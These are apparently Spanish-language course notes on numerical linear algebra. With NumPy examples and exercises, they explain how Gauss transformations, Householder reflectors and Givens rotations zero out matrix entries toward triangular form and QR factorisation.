En esta secciรณn suponemos que $A \in \mathbb{R}^{n \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{n \times n} \forall i,j=1,2,\dots,n$.
```{margin}
Como ejemplo de vector canรณnico tenemos: $e_1=(1,0)^T$ en $\mathbb{R}^2$ o $e_3 = (0,0,1,0,0)$ en $\mathbb{R}^5$.
```
Considรฉrese al vector $a \in \mathbb{R}^{n}$ y $e_k \in \mathbb{R}^n$ el $k$-รฉsimo vector canรณnico: vector con un $1$ en la posiciรณn $k$ y ceros en las entradas restantes.
```{admonition} Definiciรณn
Una transformaciรณn de Gauss estรก definida de forma general como $L_k = I_n - \ell_ke_k^T$ con $\ell_k = (0,0,\dots,\ell_{k+1,k},\dots,\ell_{n,k})^T$ y $\ell_{i,k}=\frac{a_{ik}}{a_{kk}} \forall i=k+1,\dots,n$.
$a_{kk}$ se le nombra **pivote** y **debe ser diferente de cero**.
```
Las transformaciones de Gauss se utilizan para hacer ceros por debajo del **pivote**.
(EG1)=
### Ejemplo aplicando transformaciones de Gauss a un vector
Considรฉrese al vector $a=(-2,3,4)^T$. Definir una transformaciรณn de Gauss para hacer ceros por debajo de $a_1$ y otra transformaciรณn de Gauss para hacer cero la entrada $a_3$
**Soluciรณn:**
```
import numpy as np
import math
np.set_printoptions(precision=3, suppress=True)
```
a)Para hacer ceros por debajo del **pivote** $a_1 = -2$:
```
a = np.array([-2,3,4])
pivote = a[0]
```
```{margin}
Recuerda la definiciรณn de $\ell_1=(0, \frac{a_2}{a_1}, \frac{a_3}{a_1})^T$
```
```
l1 = np.array([0,a[1]/pivote, a[2]/pivote])
```
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1a = a - \ell_1 e_1^Ta$.**
```
```
L1_a = a-l1*(e1.dot(a))
print(L1_a)
```
A continuaciรณn se muestra que el producto $L_1 a$ si se construye $L_1$ es equivalente a lo anterior:
```{margin}
$L_1 = I_3 - \ell_1 e_1^T$.
```
```
L1 = np.eye(3) - np.outer(l1,e1)
print(L1)
print(L1@a)
```
b) Para hacer ceros por debajo del **pivote** $a_2 = 3$:
```
a = np.array([-2,3,4])
pivote = a[1]
```
```{margin}
Recuerda la definiciรณn de $\ell_2=(0, 0, \frac{a_3}{a_2})^T$
```
```
l2 = np.array([0,0, a[2]/pivote])
```
```{margin}
Usamos $e_2$ pues se desea hacer ceros en las entradas debajo de la segunda.
```
```
e2 = np.array([0,1,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_2$, directamente se tiene $L_2a = a - \ell_2 e_2^Ta$.**
```
```
L2_a = a-l2*(e2.dot(a))
print(L2_a)
```
A continuaciรณn se muestra que el producto $L_2 a$ si se construye $L_2$ es equivalente a lo anterior:
```{margin}
$L_2 = I_3 - \ell_2 e_2^T$.
```
```
L2 = np.eye(3) - np.outer(l2,e2)
print(L2)
print(L2@a)
```
(EG2)=
### Ejemplo aplicando transformaciones de Gauss a una matriz
Si tenemos una matriz $A \in \mathbb{R}^{3 \times 3}$ y queremos hacer ceros por debajo de su **diagonal** y tener una forma **triangular superior**, realizamos los productos matriciales:
$$L_2 L_1 A$$
donde: $L_1, L_2$ son transformaciones de Gauss.
Posterior a realizar el producto $L_2 L_1 A$ se obtiene una **matriz triangular superior:**
$$
L_2L_1A = \left [
\begin{array}{ccc}
* & * & *\\
0 & * & * \\
0 & 0 & *ย
\end{array}
\right ]
$$
**Ejemplo:**
a) Utilizando $L_1$
```
A = np.array([[-1, 2, 5],
[4, 5, -7],
[3, 0, 8]], dtype=float)
print(A)
```
Para hacer ceros por debajo del **pivote** $a_{11} = -1$:
```
pivote = A[0, 0]
```
```{margin}
Recuerda la definiciรณn de $\ell_1=(0, \frac{a_{21}}{a_{11}}, \frac{a_{31}}{a_{11}})^T$
```
```
l1 = np.array([0,A[1,0]/pivote, A[2,0]/pivote])
e1 = np.array([1,0,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1 A[1:3,1] = A[1:3,1] - \ell_1 e_1^T A[1:3,1]$.**
```
```
L1_A_1 = A[:,0]-l1*(e1.dot(A[:,0]))
print(L1_A_1)
```
**Y se debe aplicar $L_1$ a las columnas nรบmero 2 y 3 de $A$ para completar el producto $L_1A$:**
```{margin}
Aplicando $L_1$ a la segunda columna de $A$: $A[1:3,2]$.
```
```
L1_A_2 = A[:,1]-l1*(e1.dot(A[:,1]))
print(L1_A_2)
```
```{margin}
Aplicando $L_1$ a la tercer columna de $A$: $A[1:3,3]$.
```
```
L1_A_3 = A[:,2]-l1*(e1.dot(A[:,2]))
print(L1_A_3)
```
A continuaciรณn se muestra que el producto $L_1 A$ si se construye $L_1$ es equivalente a lo anterior:
```{margin}
$L_1 = I_3 - \ell_1 e_1^T$.
```
```
L1 = np.eye(3) - np.outer(l1,e1)
print(L1)
print(L1 @ A)
```
```{admonition} Observaciรณn
:class: tip
Al aplicar $L_1$ a la primer columna de $A$ **siempre** obtenemos ceros por debajo del pivote que en este caso es $a_{11}$.
```
(EG2.1)=
**Despuรฉs de hacer la multiplicaciรณn $L_1A$ en cualquiera de los dos casos (construyendo o no explรญcitamente $L_1$) no se modifica el primer renglรณn de $A$:**
```
print(A)
```
```{margin}
Este es el primer renglรณn de $A$.
```
```
print(A[0,:])
```
```{margin}
Tomando el primer renglรณn del producto $L_1A$.
```
```
print((L1 @ A)[0,:])
```
**por lo que la multiplicaciรณn $L_1A$ entonces modifica del segundo renglรณn de $A$ en adelante y de la segunda columna de $A$ en adelante.**
```{admonition} Observaciรณn
:class: tip
Dada la forma de $L_1 = I_3 - \ell_1e_1^T$, al hacer la multiplicaciรณn por la segunda y tercer columna de $A$ se tiene:
$$e_1^T A[1:3,2] = A[0,2]$$
$$e_1^T A[1:3,3] = A[0,3]$$
respectivamente.
```
```{margin}
El resultado de este producto es un escalar.
```
```
print(e1.dot(A[:, 1]))
```
```{margin}
El resultado de este producto es un escalar.
```
```
print(e1.dot(A[:, 2]))
```
y puede escribirse de forma compacta:
$$e_1^T A[1:3,2:3] = A[0, 2:3]$$
```
print(A[0, 1:3]) #observe that we have to use 2+1=3 as the second number after ":" in 1:3
print(A[0, 1:]) #also we could have use this statement
```
Entonces los productos $\ell_1 e_1^T A[:,2]$ y $\ell_1 e_1^T A[:,3]$ quedan respectivamente como:
$$\ell_1A[0, 2]$$
```
print(l1*A[0,1])
```
$$\ell_1A[0,3]$$
```
print(l1*A[0, 2])
```
```{admonition} Observaciรณn
:class: tip
En los dos cรกlculos anteriores, las primeras entradas son iguales a $0$ por lo que es consistente con el hecho que รบnicamente se modifican dos entradas de la segunda y tercer columna de $A$.
```
De forma compacta y aprovechando funciones en *NumPy* como [np.outer](https://numpy.org/doc/stable/reference/generated/numpy.outer.html) se puede calcular lo anterior como:
```
print(np.outer(l1[1:3],A[0,1:3]))
print(np.outer(l1[1:],A[0,1:])) #also we could have use this statement
```
Y finalmente la aplicaciรณn de $L_1$ al segundo renglรณn y segunda columna en adelante de $A$ queda:
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1 A = A - \ell_1 e_1^T A$ y podemos aprovechar lo anterior para sรณlo operar de la segunda columna y segundo renglรณn en adelante.**
```
```
print(A[1:, 1:] - np.outer(l1[1:],A[0,1:]))
```
Compรกrese con:
```
print(L1 @ A)
```
Entonces sรณlo falta colocar el primer renglรณn y primera columna al producto. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
```
A_aux = A[1:, 1:] - np.outer(l1[1:],A[0,1:])
m, n = A.shape
number_of_zeros = m-1
A_aux_2 = np.column_stack((np.zeros(number_of_zeros), A_aux)) # stack two zeros
print(A_aux_2)
A_aux_3 = np.row_stack((A[0, :], A_aux_2))
print(A_aux_3)
```
que es el resultado de:
```
print(L1 @ A)
```
**Lo que falta para obtener una matriz triangular superior es hacer la multiplicaciรณn $L_2L_1A$.** Para este caso la matriz $L_2=I_3 - \ell_2e_2^T$ utiliza $\ell_2 = \left( 0, 0, \frac{a^{(1)}_{32}}{a^{(1)}_{22}} \right )^T$ donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = L_1A^{(0)}$ y $A^{(0)}=A$.
```{admonition} Ejercicio
:class: tip
Calcular el producto $L_2 L_1 A$ para la matriz anterior y para la matriz:
$$
A = \left [
\begin{array}{ccc}
1 & 4 & -2 \\
-3 & 9 & 8 \\
5 & 1 & -6
\end{array}
\right]
$$
tomando en cuenta que en este caso $L_2$ sรณlo opera del segundo renglรณn y segunda columna en adelante:
<img src="https://dl.dropboxusercontent.com/s/su4z0obupk95vql/transf_Gauss_outer_product.png?dl=0" heigth="550" width="550">
y obtener una matriz triangular superior en cada ejercicio.
```
```{admonition} Comentarios
* Las transformaciones de Gauss se utilizan para la fase de eliminaciรณn del mรฉtodo de eliminaciรณn Gaussiana o tambiรฉn llamada factorizaciรณn $LU$. Ver [Gaussian elimination](https://en.wikipedia.org/wiki/Gaussian_elimination).
* La factorizaciรณn $P, L, U$ que es la $LU$ con permutaciones por pivoteo parcial es un mรฉtodo estable numรฉricamente respecto al redondeo en la prรกctica pero inestable en la teorรญa.
```
(MATORTMATCOLORTONO)=
## Matriz ortogonal y matriz con columnas ortonormales
Un conjunto de vectores $\{x_1, \dots, x_p\}$ en $\mathbb{R}^m$ ($x_i \in \mathbb{R}^m$)es ortogonal si $x_i^Tx_j=0$ $\forall i\neq j$. Por ejemplo, para un conjunto de $2$ vectores $x_1,x_2$ en $\mathbb{R}^3$ esto se visualiza:
<img src="https://dl.dropboxusercontent.com/s/cekagqnxe0grvu4/vectores_ortogonales.png?dl=0" heigth="550" width="550">
```{admonition} Comentarios
* Si el conjunto $\{x_1,\dots,x_n\}$ en $\mathbb{R}^m$ satisface $x_i^Tx_j= \delta_{ij}= \begin{cases}
1 &\text{ si } i=j,\\
0 &\text{ si } i\neq j
\end{cases}$, ver [Kronecker_delta](https://en.wikipedia.org/wiki/Kronecker_delta) se le nombra conjunto **ortonormal**, esto es, constituye un conjunto ortogonal y cada elemento del conjunto tiene norma $2$ o Euclidiana igual a $1$: $||x_i||_2 = 1, \forall i=1,\dots,n$.
* Si definimos a la matriz $X$ con columnas dadas por cada uno de los vectores del conjunto $\{x_1,\dots, x_n\}$: $X=(x_1, \dots , x_n) \in \mathbb{R}^{m \times n}$ entonces la propiedad de que cada par de columnas satisfaga $x_i^Tx_j=\delta_{ij}$ se puede escribir en notaciรณn matricial como $X^TX = I_n$ con $I_n$ la matriz identidad de tamaรฑo $n$ si $n \leq m$ o bien $XX^T=I_m$ si $m \leq n$. A la matriz $X$ se le nombra **matriz con columnas ortonormales**.
* Si cada $x_i$ estรก en $\mathbb{R}^n$ (en lugar de $\mathbb{R}^m$) entonces construรญmos a la matriz $X$ como el punto anterior con la diferencia que $X \in \mathbb{R}^{n \times n}$. En este caso $X$ se le nombra **matriz ortogonal**.
* Entre las propiedades mรกs importantes de las matrices ortogonales o con columnas ortonormales es que son isometrรญas bajo la norma $2$ o Euclidiana y multiplicar por tales matrices es estable numรฉricamente bajo el redondeo, ver {ref}`Condiciรณn de un problema y estabilidad de un algoritmo <CPEA>`.
```
(TREF)=
## Transformaciones de reflexiรณn
En esta secciรณn suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{m \times n} \forall i=1,2,\dots,m, j=1, 2, \dots, n$.
### Reflectores de Householder
```{margin}
Recuerda que $u^\perp = \{x \in \mathbb{R}^m| u^Tx=0\}$ es un subespacio de $\mathbb{R}^m$ de dimensiรณn $m-1$ y es el complemento ortogonal de $u$.
```
```{admonition} Definiciรณn
Las reflexiones de Householder son matrices **simรฉtricas, ortogonales** y se construyen a partir de un vector $v \neq 0$ definiendo:
$$R = I_m-\beta v v^T$$
con $v \in \mathbb{R}^m - \{0\}$ y $\beta = \frac{2}{v^Tv}$. El vector $v$ se llama **vector de Householder**. La multiplicaciรณn $Rx$ representa la reflexiรณn del vector $x \in \mathbb{R}^m$ a travรฉs del hiperplano $v^\perp$.
```
```{admonition} Comentario
Algunas propiedades de las reflexiones de Householder son: $R^TR = R^2 = I_m$, $R^{-1}=R$, $det(R)=-1$.
```
```{sidebar} Proyector ortogonal elemental
En este dibujo se utiliza el **proyector ortogonal elemental** sobre el complemento ortogonal $u^\perp$ definido como: $P=I_m- u u^T$ y $Px$ es la proyecciรณn ortogonal de $x$ sobre $u^\perp$ . Los proyectores ortogonales elementales **no** son matrices ortogonales, son singulares, son simรฉtricas y $P^2=P$. El proyector ortogonal elemental de $x$ sobre $u^\perp$ tienen $rank$ igual a $m-1$ y el proyector ortogonal de $x$ sobre $span\{u\}$ definido por $I_m-P=uu^T$ tienen $rank$ igual a $1$.
<img src="https://dl.dropboxusercontent.com/s/itjn9edajx4g2ql/elementary_projector_drawing.png?dl=0" heigth="350" width="350">
Recuerda que $span\{u\}$ es el conjunto generado por $u$. Se define como el conjunto de combinaciones lineales de $u$: $span\{u\} = \left \{\displaystyle \sum_{i=1}^m k_i u_i | k_i \in \mathbb{R} \forall i =1,\dots,m \right \}$.
```
Un dibujo que ayuda a visualizar el reflector elemental alrededor de $u^\perp$ en el que se utiliza $u \in \mathbb{R}^m - \{0\}$ , $||u||_2 = 1$ y $R=I_m-2 u u^T$ es el siguiente :
<img src="https://dl.dropboxusercontent.com/s/o3oht181nm8lfit/householder_drawing.png?dl=0" heigth="350" width="350">
Las reflexiones de Householder pueden utilizarse para hacer ceros por debajo de una entrada de un vector.
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al vector $x=(1,2,3)^T$. Definir un reflector de Householder para hacer ceros por debajo de $x_1$.
```
x = np.array([1,2,3])
print(x)
```
Utilizamos la definiciรณn $v=x-||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico para construir al vector de Householder:
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
v = x-np.linalg.norm(x)*e1
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R$, directamente se tiene $R x = x - \beta vv^Tx$.**
```
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
```
print(x-beta*v*(v.dot(x)))
```
El resultado de $Rx$ es $(||x||_2,0,0)^T$ con $||x||_2$ dada por:
```
print(np.linalg.norm(x))
```
```{admonition} Observaciรณn
:class: tip
* Observa que se preserva la norma $2$ o Euclidiana del vector, las matrices de reflexiรณn de Householder son matrices ortogonales y por tanto isometrรญas: $||Rv||_2=||v||_2$.
* Observa que a diferencia de las transformaciones de Gauss con las reflexiones de Householder en general se modifica la primera entrada, ver {ref}`Ejemplo aplicando transformaciones de Gauss a un vector <EG1>`.
```
A continuaciรณn se muestra que el producto $Rx$ si se construye $R$ es equivalente a lo anterior:
```{margin}
$R = I_3 - \beta v v^T$.
```
```
R = np.eye(3)-beta*np.outer(v,np.transpose(v))
print(R)
print(R@x)
```
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al mismo vector $x$ del ejemplo anterior y el mismo objetivo "Definir un reflector de Householder para hacer ceros por debajo de $x_1$.". Otra opciรณn para construir al vector de Householder es $v=x+||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico:
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
v = x+np.linalg.norm(x)*e1
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R$, directamente se tiene $R x = x - \beta vv^Tx$.**
```
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
```
print(x-beta*v*(v.dot(x)))
```
```{admonition} Observaciรณn
:class: tip
Observa que difieren en signo las primeras entradas al utilizar $v=x + ||x||_2 e_1$ o $v=x - ||x||_2 e_1$.
```
### ยฟCuรกl definiciรณn del vector de Householder usar?
En cualquiera de las dos definiciones del vector de Householder $v=x \pm ||x||_2 e_1$, la multiplicaciรณn $Rx$ refleja $x$ en el primer eje coordenado (pues se usa $e_1$):
<img src="https://dl.dropboxusercontent.com/s/bfk7gojxm93ah5s/householder_2_posibilites.png?dl=0" heigth="400" width="400">
El vector $v^+ = - u_0^+ = x-||x||_2e_1$ refleja $x$ respecto al subespacio $H^+$ (que en el dibujo es una recta que cruza el origen). El vector $v^- = -u_0^- = x+||x||_2e_1$ refleja $x$ respecto al subespacio $H^-$.
Para reducir los errores por redondeo y evitar el problema de cancelaciรณn en la aritmรฉtica de punto flotante (ver [Sistema de punto flotante](https://itam-ds.github.io/analisis-numerico-computo-cientifico/I.computo_cientifico/1.2/Sistema_de_punto_flotante.html)) se utiliza:
$$v = x+signo(x_1)||x||_2e_1$$
donde: $signo(x_1) = \begin{cases}
1 &\text{ si } x_1 \geq 0 ,\\
-1 &\text{ si } x_1 < 0
\end{cases}.$
La idea de la definciรณn anterior con la funciรณn $signo(\cdot)$ es que la reflexiรณn (en el dibujo anterior $-||x||_2e_1$ o $||x||_2e_1$) sea lo mรกs alejada posible de $x$. En el dibujo anterior como $x_1, x_2>0$ entonces se refleja respecto al subespacio $H^-$ quedando su reflexiรณn igual a $-||x||_2e_1$.
```{admonition} Comentarios
* Otra forma de lidiar con el problema de cancelaciรณn es definiendo a la primera componente del vector de Householder $v_1$ como $v_1=x_1-||x||_2$ y haciendo una manipulaciรณn algebraica como sigue:
$$v_1=x_1-||x||_2 = \frac{x_1^2-||x||_2^2}{x_1+||x||_2} = -\frac{x_2^2+x_3^2+\dots + x_m^2}{x_1+||x||_2}.$$
* En la implementaciรณn del cรกlculo del vector de Householder, es รบtil que $v_1=1$ y asรญ รบnicamente se almacenarรก $v[2:m]$. Al vector $v[2:m]$ se le nombra **parte esencial del vector de Householder**.
* Las transformaciones de reflexiรณn de Householder se utilizan para la factorizaciรณn QR. Ver [QR decomposition](https://en.wikipedia.org/wiki/QR_decomposition), la cual es una factorizaciรณn estable numรฉricamente bajo el redondeo.
```
```{admonition} Ejercicio
:class: tip
Reflejar al vector $\left [\begin{array}{c}1 \\1 \\\end{array}\right ]$ utilizando al vector $\left [\begin{array}{c}\frac{-4}{3}\\\frac{2}{3}\end{array}\right ]$ para construir $R$.
```
### Ejemplo aplicando reflectores de Householder a una matriz
Las reflexiones de Householder se utilizan para hacer ceros por debajo de la **diagonal** a una matriz y tener una forma triangular superior (mismo objetivo que las transformaciones de Gauss, ver {ref}`Ejemplo aplicando transformaciones de Gauss a una matriz <EG2>`). Por ejemplo si se han hecho ceros por debajo del elemento $a_{11}$ y se quieren hacer ceros debajo de $a_{22}^{(1)}$:
$$\begin{array}{l}
R_2A^{(1)} = R_2
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & * & * & * \\
0 & * & * & * \\
0 & * & * & *
\end{array}
\right]
=
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & 0 & * & * \\
0 & 0 & * & * \\
0 & 0 & * & *
\end{array}
\right]
:= A^{(2)}
\end{array}
$$
donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = R_1A^{(0)}$ y $A^{(0)}=A$, $R_1$ es matriz de reflexiรณn de Householder.
En este caso
$$R_2 =
\left [
\begin{array}{cc}
1 & 0 \\
0 & \hat{R_2}
\end{array}
\right ]
$$
con $\hat{R}_2$ una matriz de reflexiรณn de Householder que hace ceros por debajo de de $a_{22}^{(1)}$. Se tienen las siguientes propiedades de $R_2$:
* No modifica el primer renglรณn de $A^{(1)}$.
* No destruye los ceros de la primer columna de $A^{(1)}$.
* $R_2$ es una matriz de reflexiรณn de Householder.
```{admonition} Observaciรณn
:class: tip
Para la implementaciรณn computacional **no se inserta** $\hat{R}_2$ en $R_2$, en lugar de esto se aplica $\hat{R}_2$ a la submatriz $A^{(1)}[2:m, 2:m]$.
```
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 3}$:
$$A =
\left [
\begin{array}{ccc}
3 & 2 & -1 \\
2 & 3 & 2 \\
-1 & 2 & 3 \\
2 & 1 & 4
\end{array}
\right ]
$$
y aplรญquense reflexiones de Householder para llevarla a una forma triangular superior.
```
A = np.array([[3 ,2, -1],
[2 ,3 ,2],
[-1, 2 ,3],
[2 ,1 ,4]], dtype = float)
print(A)
```
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera entrada de la primera columna de $A$: $A[1:4,1]$.
```
```
e1 = np.array([1,0,0,0])
```
```{margin}
Recuerda la definiciรณn de $v= A[1:4,1] + signo(A[1,1])||A[1:4,1]||_2e_1$.
```
```
v = A[:,0] + np.linalg.norm(A[:,0])*e1
print(v)
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
print(beta)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R_1$, directamente se tiene $R_1 A[1:4,1] = A[1:4,1] - \beta vv^TA[1:4,1]$.**
```
```
print(A[:,0] - beta*v*v.dot(A[:,0]))
```
```{margin}
Recuerda $A^{(1)} = R_1 A^{(0)}$.
```
```
A1 = A[:,0:]-beta*np.outer(v,v.dot(A[:,0:]))
print(A1)
```
```{admonition} Observaciรณn
:class: tip
Observa que a diferencia de las transformaciones de Gauss la reflexiรณn de Householder $R_1$ sรญ modifica el primer renglรณn de $A^{(0)}$, ver {ref}`Despuรฉs de hacer la multiplicaciรณn... <EG2.1>`.
```
```{margin}
Se preserva la norma $2$ o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A1[:,0]))
print(np.linalg.norm(A[:,0]))
```
**A continuaciรณn queremos hacer ceros debajo de la segunda entrada de la segunda columna de $A^{(1)}$.**
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la segunda entrada de la segunda columna de $A^{(1)}$: $A^{(1)}[2:4,2]$.
```
```
e1 = np.array([1, 0, 0])
```
```{margin}
Recuerda la definiciรณn de $v= A[2:4,2] + signo(A[2,2])||A[2:4,2]||_2e_1$.
```
```
v = A1[1:,1] + np.linalg.norm(A1[1:,1])*e1
print(v)
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R_2$, directamente se tiene $R_2A[2:4,2] = A[2:4,2] - \beta vv^TA[2:4,2]$.**
```
```
print(A1[1:,1] - beta*v*v.dot(A1[1:,1]))
```
```{margin}
Recuerda $A^{(2)} = R_2 A^{(1)}$ pero sรณlo operamos en $A^{(2)}[2:4, 2:3]$.
```
```
A2_aux = A1[1:,1:]-beta*np.outer(v,v.dot(A1[1:,1:]))
print(A2_aux)
```
```{margin}
Se preserva la norma $2$ o Euclidiana de $A[2:4,2]$.
```
```
print(np.linalg.norm(A1[1:,1]))
```
**A continuaciรณn queremos hacer ceros debajo de la tercera entrada de la tercera columna de $A^{(2)}$.**
```
e1 = np.array([1, 0])
v = A2_aux[1:,1] + np.linalg.norm(A2_aux[1:,1])*e1
print(v)
beta = 2/v.dot(v)
```
```{margin}
Recuerda $A^{(3)} = R_3 A^{(2)}$ pero sรณlo operamos en $A^{(2)}[3:4, 3]$.
```
```
A3_aux = A2_aux[1:,1]-beta*v*v.dot(A2_aux[1:,1])
print(A3_aux)
print(np.linalg.norm(A2_aux[1:,1]))
```
Entonces sรณlo falta colocar los renglones y columnas para tener a la matriz $A^{(3)}$. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
```
m,n = A.shape
number_of_zeros = m-2
A3_aux_2 = np.column_stack((np.zeros(number_of_zeros), A3_aux))
print(A3_aux_2)
A3_aux_3 = np.row_stack((A2_aux[0, 0:], A3_aux_2))
print(A3_aux_3)
number_of_zeros = m-1
A3_aux_4 = np.column_stack((np.zeros(number_of_zeros), A3_aux_3))
print(A3_aux_4)
```
La matriz $A^{(3)} = R_3 R_2 R_1 A^{(0)}$ es:
```
A3 = np.row_stack((A1[0, 0:], A3_aux_4))
print(A3)
```
Podemos verificar lo anterior comparando con la matriz $R$ de la factorizaciรณn $QR$ de $A$:
```
q,r = np.linalg.qr(A)
print("Q:")
print(q)
print("R:")
print(r)
```
```{admonition} Ejercicio
:class: tip
Aplicar reflexiones de Householder a la matriz
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
para obtener una matriz triangular superior.
```
(TROT)=
## Transformaciones de rotaciรณn
En esta secciรณn suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}^{m \times n} \forall i=1,2,\dots,m, j=1, 2, \dots, n$.
Si $u, v \in \mathbb{R}^2-\{0\}$ con $\ell = ||u||_2 = ||v||_2$ y se desea rotar al vector $u$ en sentido contrario a las manecillas del reloj por un รกngulo $\theta$ para llevarlo a la direcciรณn de $v$:
<img src="https://dl.dropboxusercontent.com/s/vq8eu0yga2x7cb2/rotation_1.png?dl=0" heigth="500" width="500">
A partir de las relaciones anteriores como $cos(\phi)=\frac{u_1}{\ell}, sen(\phi)=\frac{u_2}{\ell}$ se tiene: $v_1 = (cos\theta)u_1-(sen\theta)u_2$, $v_2=(sen\theta)u_1+(cos\theta)u_2$ equivalentemente:
$$\begin{array}{l}
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]
=
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right] \cdot
\left[\begin{array}{c}
u_1\\
u_2
\end{array}
\right]
\end{array}
$$
```{admonition} Definiciรณn
La matriz $R_O$:
$$R_O=
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
$$
se nombra matriz de **rotaciรณn** o **rotaciones Givens**, es una matriz ortogonal pues $R_O^TR_O=I_2$.
La multiplicaciรณn $v=R_Ou$ es una rotaciรณn en sentido contrario a las manecillas del reloj, de hecho cumple $det(R_O)=1$. La multiplicaciรณn $u=R_O^Tv$ es una rotaciรณn en sentido de las manecillas del reloj y el รกngulo asociado es $-\theta$.
```
### Ejemplo aplicando rotaciones Givens a un vector
Rotar al vector $v=(1,1)^T$ un รกngulo de $45^o$ en **sentido contrario a las manecillas del reloj**.
```
v=np.array([1,1])
```
La matriz $R_O$ es:
$$R_O = \left[ \begin{array}{cc}
cos(\frac{\pi}{4}) & -sen(\frac{\pi}{4})\\
sen(\frac{\pi}{4}) & cos(\frac{\pi}{4})
\end{array}
\right ]
$$
```
theta=math.pi/4
RO=np.array([[math.cos(theta), -math.sin(theta)],
[math.sin(theta), math.cos(theta)]])
print(RO)
print(RO@v)
print(np.linalg.norm(v))
```
```{admonition} Observaciรณn
:class: tip
Observa que se preserva la norma $2$ o Euclidiana del vector, las matrices de rotaciรณn Givens son matrices ortogonales y por tanto isometrรญas: $||R_0v||_2=||v||_2$.
```
En el ejemplo anterior se hizo cero la entrada $v_1$ de $v$. Las matrices de rotaciรณn se utilizan para hacer ceros en entradas de un vector. Por ejemplo si $v=(v_1,v_2)^T$ y **se desea hacer cero la entrada $v_2$ de $v$** se puede utilizar la matriz de rotaciรณn:
$$R_O = \left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
$$
pues:
$$\begin{array}{l}
\left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ] \cdot
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
\frac{-v_1v_2+v_1v_2}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
0
\end{array}
\right ]=
\left[ \begin{array}{c}
||v||_2\\
0
\end{array}
\right ]
\end{array}
$$
Y definiendo $cos(\theta)=\frac{v_1}{\sqrt{v_1^2+v_2^2}}, sen(\theta)=\frac{v_2}{\sqrt{v_1^2+v_2^2}}$ se tiene :
$$
R_O=\left[ \begin{array}{cc}
cos\theta & sen\theta\\
-sen\theta & cos\theta
\end{array}
\right]
$$
